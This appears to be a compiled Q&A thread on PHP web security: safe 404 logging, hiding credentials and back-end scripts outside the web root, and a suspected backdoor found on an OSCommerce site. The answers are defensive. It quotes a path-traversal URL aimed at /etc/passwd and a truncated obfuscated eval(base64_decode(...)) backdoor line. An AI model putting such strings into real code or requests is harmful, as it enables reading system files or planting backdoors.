Security vulnerabilities in php fwrite? - php

I recently transitioned my company's website from a hosting company's servers (IIS) over to our in-house servers (Apache). The group that originally built the site did a piss-poor job, and the entire thing was a mess to migrate. While the move went fairly smoothly, looking at the error_log there are still some missing pages.
Rather than having to continually grep through the error_log for "File does not exist" errors relating to this domain - we have about 15 or so we host on these servers - I was wondering if it might be easier to simply do the following when a 404 error occurs:
redirect to a php page and pass the original URL request
have the new php page dump the URL to a log-ish file
As I type this I am becoming less and less convinced that this is a worthwhile undertaking. Regardless, the underlying question is: are there potential security issues with using fwrite? Does there need to be any sort of scrubbing of user input if that input is going to be appended to a file? This input would not be going anywhere near a database, for whatever that is worth. Thanks in advance.

As long as you are the one defining which file you are writing to (and not deriving it from the URL), there should not be much risk: the only thing you'll get from the user is the content you'll write to the file, and as long as you don't execute that file, but just read it, it should be quite OK.
The idea of logging 404 errors this way is not new: I've seen it done quite a few times, and have never faced any major problem with it (the biggest problem I saw was a file that grew very big very fast, because there were far too many errors).
For instance, Drupal does a bit of this: 404 errors are logged, but to a database, so it's easier to analyse them using the web interface.

Well, just the usual filesystem stuff: don't let the user specify where the file will go. Things like script.php?filename=../../../../../../../etc/passwd shouldn't even have a chance of writing to /etc/passwd (and the script shouldn't have filesystem permissions for that anyway).
Other than that, fwrite() doesn't have any special characters that would allow input to jump into some sort of command mode.
Also, the 404 page is pretty simple (in httpd.conf):
ErrorDocument 404 /error_page.php
and just dump the REQUEST_URI to a file
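A minimal error_page.php along those lines might look like the sketch below; the log path is an assumption, and it should live outside the web root:

```php
<?php
// error_page.php -- sketch of a 404 logger; file name and path are assumptions.

// Build one log line from the requested URL, encoded so the log stays
// plain text even if the URL contains markup.
function format404Line($url)
{
    return date('c') . ' ' . rawurlencode($url) . "\n";
}

$logFile = '/var/log/myapp/404.log';   // assumed location, not web-accessible
$url     = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '';

// FILE_APPEND|LOCK_EX appends under an exclusive lock; errors are
// suppressed here only to keep the sketch short.
@file_put_contents($logFile, format404Line($url), FILE_APPEND | LOCK_EX);

header('HTTP/1.1 404 Not Found');
echo 'Sorry, that page could not be found.';
```

Because the file name is fixed in the script, the user controls only the content of each line, never the destination.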

fwrite should be pretty safe.
Alternatively you can use some access log analyzer which usually lists not found pages.

If all it is doing is writing to disk, the only thing someone on the outside can do is get it to write to disk. Obviously, the file name should not be a parameter passed in with the invalid URL. Someone could try to exploit it by sending tons of invalid page requests with really long URLs, but they would have to know you were doing this and care enough, when there are other, more effective general attacks.

There is a potential issue to look out for if you are writing logs as HTML (or another file type that happens to allow embedded code). These files are of course vulnerable to XSS attacks.

A common logfile attack is to request URLs containing embedded malicious JavaScript. These URLs are written directly to a log file, and the script then executes when anyone views the file in a web browser.
Ensure the file you write cannot be served as HTML by the web server
Consider URL-encoding or HTML-encoding the URLs.
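A hedged sketch of that encoding step (the log path is an assumption; htmlspecialchars and rawurlencode are standard PHP):

```php
<?php
// Sketch: neutralize a request URL before appending it to a log file.
// The log path is an assumption; keep it outside the document root.
$url = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/';

// HTML-encode so an embedded <script> tag is inert if the log is ever
// opened in a browser; rawurlencode() would work just as well.
$safe = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');

$fp = @fopen('/var/log/myapp/404.log', 'ab');
if ($fp !== false) {
    fwrite($fp, $safe . "\n");
    fclose($fp);
}
```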

You should already be recording the 404 errors in your error_log.
By all means use a custom error handler to give the user a friendlier error message, but if this site sees any sort of serious throughput, then using fwrite from the script is not a good idea. PHP does not intrinsically have the sort of sophisticated file-locking semantics needed to support concurrent file access safely, but since the webserver is already recording the information for you, why bother?
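If you do log from PHP anyway, flock() gives you advisory locking around the append; a minimal sketch (the log path is an assumption):

```php
<?php
// Sketch: advisory locking around an append, so concurrent requests
// don't interleave their writes. The log path is an assumption.
$logFile = '/tmp/404.log';

$fp = fopen($logFile, 'ab');
if ($fp !== false && flock($fp, LOCK_EX)) {  // block until the lock is ours
    fwrite($fp, date('c') . " example entry\n");
    fflush($fp);                             // flush before releasing the lock
    flock($fp, LOCK_UN);
}
if ($fp !== false) {
    fclose($fp);
}
```

file_put_contents($logFile, $line, FILE_APPEND | LOCK_EX) is a shorter equivalent for a single write.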

Related

PHP Sessions: Make non-PHP files require login

I am setting up a little page with a quite simple login-system via PHP Sessions. Business as usual: the correct Username/Password combination sets $_SESSION['login'] to true. When opening /page1.php or /page2.php a few lines of PHP will check the login state.
As I would like to have it nice and secure I would also like to keep unauthorized visitors from accessing files other than .php, for instance my javascript or CSS files.
I thought of a few ways to do that:
htaccess/htpasswd is the most obvious option, but I am searching for something more fancy. You know, having a custom UI etc...
mod_rewrite could redirect everything to a PHP file like fetch.php?url=script.js, which could then execute my PHP before echoing the content of script.js. But this way I would have to mess around with MIME types, and it would bypass all other kinds of htaccess protection. Seems like a security risk to me.
declaring an auto_prepend_file in my .htaccess would do a similar job, yet it does not create any MIME-type problems or security issues. I couldn't really get it to work on my server, though; it was probably deactivated by my server host.
Do you have any additional idea? I assume this is a common problem, so there should be a solution for it. Thanks in advance!
To keep it consistent (not have one login via PHP and one via basic auth) you'll need to run all your assets through PHP. However, I highly recommend against this for several performance reasons:
It incurs a lot more latency to serve files via PHP vs. the server daemon (nginx/Apache)
It adds unnecessary load on server CPU and memory
It wastes time locking up processes that could be used to serve more requests
You'll never be able to use a CDN with this logged-in-only requirement for your assets
I think the main suggestion in my answer is to rethink what you're doing that requires your client to be logged in to access CSS and JS assets. Are you putting passwords in the JS or something? If so, I recommend a deeper evaluation of your architecture over passing all assets through PHP.
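For completeness, a sketch of what the gated-asset script the question describes could look like; note this is exactly the approach recommended against above, and the file names, whitelist, and asset directory are all assumptions:

```php
<?php
// fetch.php -- sketch of the gated-asset approach discussed above.
// Names and paths are assumptions, not a recommended design.
session_start();

// Whitelist of servable assets mapped to MIME types. Never trust ?url=
// directly, or a path like ../../config.php could be requested.
function assetType($name)
{
    $assets = array(
        'script.js' => 'application/javascript',
        'style.css' => 'text/css',
    );
    return isset($assets[$name]) ? $assets[$name] : null;
}

$name = isset($_GET['url']) ? $_GET['url'] : '';
$type = assetType($name);

if (empty($_SESSION['login']) || $type === null) {
    header('HTTP/1.1 404 Not Found');
} else {
    header('Content-Type: ' . $type);
    readfile(__DIR__ . '/assets/' . $name);   // assumed asset directory
}
```

Every CSS/JS request now costs a PHP process and a session lookup, which is the latency and CPU overhead listed above.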

Running PHP code from remote server?

I want to prevent access to the functions file in my Wordpress theme. I thought to hide functions.php by putting it on my server and calling it from the client's server. Is that a workable solution? Is there a better approach?
Why not change permissions? You could also move it to a non-public part of the directory tree and place a small forwarding file in the public location. That is how I use wp-config. I don't see why you couldn't do that with functions.php
This is technically possible if your client's server has allow_url_include set. However, it's still a bad idea for four reasons:
Speed: opening another HTTP request and waiting for it to complete every time anyone views your client's site will get slow very fast. It'll also hammer your site.
Security: The PHP file on the remote server (your server, in this case) will need to be printed in plaintext. This could be a bad thing, particularly if you've written customized, potentially-insecure code in it. Coincidentally, this also means that your approach won't actually stop your client from finding out what the script does. There's also nothing stopping the client from loading the URL of your unprotected script, pasting it into his WordPress directory, and altering the include. Additionally, if your server is ever compromised or someone snatches your domain, they can then inject code onto your client's server with impunity.
Ethics: Unless your client is explicitly made aware of this arrangement, it is unethical because if your business relationship terminates he or she will still be vulnerable to code injection, even after terminating your FTP/SSH/WordPress dashboard access.
Reliability: If you do this, any time your site is offline your client's site will die with a messy error message.
Re-homing executable code on your server is probably a really bad idea: while it is absolutely technically possible, there are many compelling reasons, listed above, why doing things this way is a bad idea.
If you are trying to protect proprietary code from the client, your only good options are to:
Host his site yourself. This could be profitable down the line if your technology is something that a specialized hosting company could be built around.
Build an API that can grant metered access to your proprietary data or processing, and write a WordPress plugin to talk to the API. This could be profitable down the line both by encouraging developers to write software for your system, and the WordPress plugin would lower the barrier for entry to doing business with you.
You can just put a .htaccess rule that redirects /functions.PHP to your homepage. This is what Facebook does.
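A hedged sketch of such a rule (mod_alias; the theme path here is only an example):

```apache
# .htaccess in the site root: send direct requests for the theme's
# functions.php back to the homepage ("mytheme" is a placeholder path).
RedirectMatch 301 ^/wp-content/themes/mytheme/functions\.php$ /
```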
Edit: see my comment below.

Is it a security risk to have your database details in a php file accessable via the browser?

I've just had an argument with a colleague.
My index.php contains my MySQL connection and therefore also the host, username, password and database name.
He claims it is a security threat, because the possibility exists that the PHP parser may fail, which would cause the webserver to return the entire file as plain text.
I, however, believe that if the PHP parser failed, the webserver would return an internal server error to the users.
Can anyone confirm whether it is or is not a security risk?
thank you.
The short answer is no.
The long answer is yes, but only if:
your server's been compromised, in which case people reading your php files are the least of your worries
you've misconfigured your server to serve .php files as plain text, which would be very silly indeed.
Also, if you're using some kind of version control software, make sure your .hg or .svn or whatever folders can't be viewed from a web browser. You'd be surprised how often that happens.
EDIT:
I would be inclined to go with some of the suggestions on here already, which is what I do in my day to day development. Have a config.php file outside of your web root folder and include this in your index.php. That way you know for sure it's never going to be viewable. Btw, I've been developing in PHP for a number of years and have never had the parser fail in such a way that it's resulted in raw PHP being displayed to an end user.
EDIT 2:
If your colleague is referring to parse errors when he talks about the PHP parser "failing" then in a live environment you should have error reporting disabled anyway.
Either outcome is a possibility. The normal course of action is to use require to bring in a separate file containing your db credentials. That file should be outside the webserver file tree so it can't be reached via a browser.
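A sketch of that layout, with assumed paths and placeholder credentials:

```php
<?php
// Sketch with assumed paths: credentials live one level ABOVE the document
// root, where the webserver never serves files directly.

// /var/www/example.com/config/db.php would contain only the credentials
// (reproduced inline here for illustration; values are placeholders):
if (!defined('DB_HOST')) {
    define('DB_HOST', 'localhost');
    define('DB_USER', 'appuser');
    define('DB_PASS', 'secret');
    define('DB_NAME', 'appdb');
}

// /var/www/example.com/htdocs/index.php would then start with:
//
//   require dirname(__DIR__) . '/config/db.php';
//   $link = mysqli_connect(DB_HOST, DB_USER, DB_PASS, DB_NAME);
```

Since config/db.php sits outside htdocs/, no URL maps to it, so even a misbehaving parser can't hand it to a browser.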
I'm of the belief that you can never be too safe. What's easier: replacing thousands, possibly millions of records if a hacker gets your DB information, explaining the security breach to your users (and possibly their lawyers, depending on the content and the breach), or putting your DB information in a separate, protected folder and including it on the pages that need the connection?
To me, the choice is simple.
Your co-worker is correct but this is very unlikely to happen. The .php file will only be returned as plain text or as a download if PHP has stopped running on the host.
To be safer, include() the database credentials from a file in a separate folder. In that folder, have a .htaccess file with 'deny from all'.
That way, even if PHP stops running on the server, Apache will still run and protect all the files, including the database credentials. If even Apache stops running, the whole webserver will be unreachable and your credentials will still be safe.
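The .htaccess in that credentials folder would be just:

```apache
# .htaccess inside the credentials folder.
# Apache 2.2 syntax, matching the answer above:
Order deny,allow
Deny from all

# Apache 2.4 equivalent:
#   Require all denied
```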
:)
Personally I'd put the options in a config file outside the web tree and, once uploaded, remove FTP access from that directory. It's not just a matter of whether the PHP parser fails and drops the file out as plain text: if the FTP server has a vulnerability that gets compromised, that file could be accessed by FTP as well as HTTP.
As long as Apache/PHP is running as a separate user to FTP you can still require the config file from PHP.

Why should I prevent direct access to PHP files that do not echo anything?

For example, if I have a mail script or a script that writes to a database - scripts that do not echo anything important (other than a thank-you or an error message), but do a lot of important back-end work.
What could the possible security concerns from accessing them directly be?
Is it worth preventing direct access to such files?
They receive data via $_POST/$_GET sent through contact forms and then either mail it or write it to a DB (in both cases after good validation).
Still, can the data being worked with there be accessed somehow (other than by cracking my account and downloading the files :)), since obviously opening such files in a browser will not give any results to the attacker?
Server misconfiguration
The security risk is that, in case the web server fails to execute the PHP file (because its configuration was reset), its source code will be displayed in the browser as plain text. You probably want to prevent that.
Wrong Context
Next to that scenario, another problem is that if the file actually does something with your database data, for example, calling it even without any direct output will still have indirect effects. This is normally unwanted as well.
In your case it sends an email even, so direct requests can be used to send emails. That is probably unwanted as well.
Not to mention the risks this can pose in getting your system penetrated. Not that this would be the only place where that is possible, but you should keep the attack surface small.
Improved File-Handling
The best approach however is to store the applications code outside of the webroot, so that those files are never accessible by a direct HTTP request.
You just don't know what the script will do when executed out of context, so first of all, it's a good thing to prevent that from happening. Preferably this is done by setting a variable (or rather a DEFINE) in your entry page and making all other files check that it is set.
Then, it's a good idea to put the other files in a separate directory, outside your document root. This will prevent the scripts from being downloaded. That should never happen anyway, because they are usually parsed, but a single error might cause PHP to be disabled, in which case the PHP files are fed through Apache as if they were plain text files.
If people can view your code, they may find out about data structure, maybe passwords, and vulnerabilities in your code.
So, if possible, put your files outside your documents root. If you do that, you won't need to check for that define, but it won't hurt if you do.
Like Chris said, if the script accepts any $_GET, $_POST or $_COOKIE parameters, there is the risk of someone being able to easily penetrate your server.
If the script actually performs any actions that might cause problems if run too often or too quickly (like a long-running mail script), you might be an easy target for a DOS attack.
Basically, if the script does anything with anything and should only be called from another script, prevent it from running under any other circumstance. Some OSS projects (Joomla, Wordpress, etc.) use a constant to verify that a file is actually being called from within the application. The constant won't exist if the script is called by a user directly from their browser.
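A sketch of that marker-constant pattern; 'IN_APP' is a hypothetical name chosen here (WordPress uses ABSPATH, Joomla uses _JEXEC):

```php
<?php
// Sketch of the marker-constant guard against direct access.
// 'IN_APP' is a hypothetical constant name.

// index.php, the only intended entry point, defines the marker:
define('IN_APP', true);

// Then the very first lines of every back-end script (e.g. sendmail.php):
if (!defined('IN_APP')) {
    exit('No direct access.');   // a direct browser hit stops right here
}
// ... the real mail/DB work continues below ...
```

A browser request straight to the back-end script never passes through index.php, so the constant is undefined and the script exits before touching the mail or database code.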
If you don't intend your scripts to be accessed directly, then yes you should probably prevent access. Whether or not they echo anything is beside the point. The bigger problem is that they may still accept input from a user in the form of a $_GET, $_POST, $_SESSION, or $_COOKIE. This could lead to SQL injection amongst other concerns. Furthermore, without the guidance of the main frontend page, the backend scripts may not know how to properly do their job (certain vars may not be set, etc) so very odd behavior could result.
The best thing you could do is put the worrisome php files outside of the htdocs directory, and then use require to pull them in. Obviously you'd need to set up your paths.

Unexpected PHP file showed up in OSCommerce

Was digging through the OSCommerce files on my site and found a file in the /images folder that I don't ever remember seeing before. I haven't checked the original install package, but I suspect this isn't a part of it.
The file is 27kb and called vidovic_pretty.php. It's encoded or compiled in some way, so the contents are unviewable. (see below)
<?eval(base64_decode("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7MjUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7...
Running it displays a single html textbox and a button that says, "Check."
Anyone have any ideas what it is or what it might do?
Thanks
This is most likely something a hacker injected - encoded and minimized. You can echo the result of base64_decode(...) instead of evaluating it to see what it would try to perform. BTW, actually running it was probably a big mistake.
If you can provide the entire string within the base64_decode... or actually, instead of calling eval, just call echo:
<?echo base64_decode("JGs9M...");
You'll be able to see what it does. But, typically, this is the signature of a backdoor/attacker; I've seen this style before. And the fact that it's in the images/ directory may mean they were able to get something like photo.gif.php uploaded ...
Probably not good at all.
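A safer way to inspect the payload is to decode it on the command line rather than in anything that might execute it; for example (a harmless sample string is shown here, not the real payload):

```shell
# Decode a base64 blob to stdout without ever executing it.
# (Sample string shown; substitute the real payload from the file.)
printf 'JGs9MTQzOw==' | base64 -d
# -> $k=143;
```

The decoded text is just printed, so you can read what the script would have eval'ed.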
Running it displays a single html textbox and a button that says, "Check."
Does it post to a page? Maybe the page receives whatever is in the textbox and executes it via system(), exec(), etc....
Definitely a baddie you got there. As others have pointed out, it most probably serves as a nice backdoor for the attacker to run arbitrary commands on your system.
What you should, at a bare minimum, do is:
Notify your tech support and ask for them to find out what the attacker changed and when
If you are on a shared host, move to a dedicated server (or at least a VPS)
Back up your data, verifying it's clean in the process
Roll back to a backup made before the box has been compromised
Apply any and all security patches to the software you have been running, the OS, etc.
Reinstall your scripts then re-import the clean data
I have absolutely no doubt in my mind that you have been hacked. You have discovered a backdoor and you must remove it immediately. These are often put in place by automated attack systems, and then a hacker can come back at a later date and assume control over your server, or use your server to attack web browsers that visit it. I have cleaned up hacks identical to this before. I'm surprised you aren't on Google's malware list; that is usually people's first indication.
I really want to find out the PHP code that is being eval'ed. Can you post the full base64? Maybe split it up by newlines so it will fit.
In my PHP framework, I do not allow files to be uploaded that apache might know how to execute upon retrieval.
If you must print out a thing like this, do it in a CLI version of PHP; don't send it to your browser! It might include something that your browser will execute.
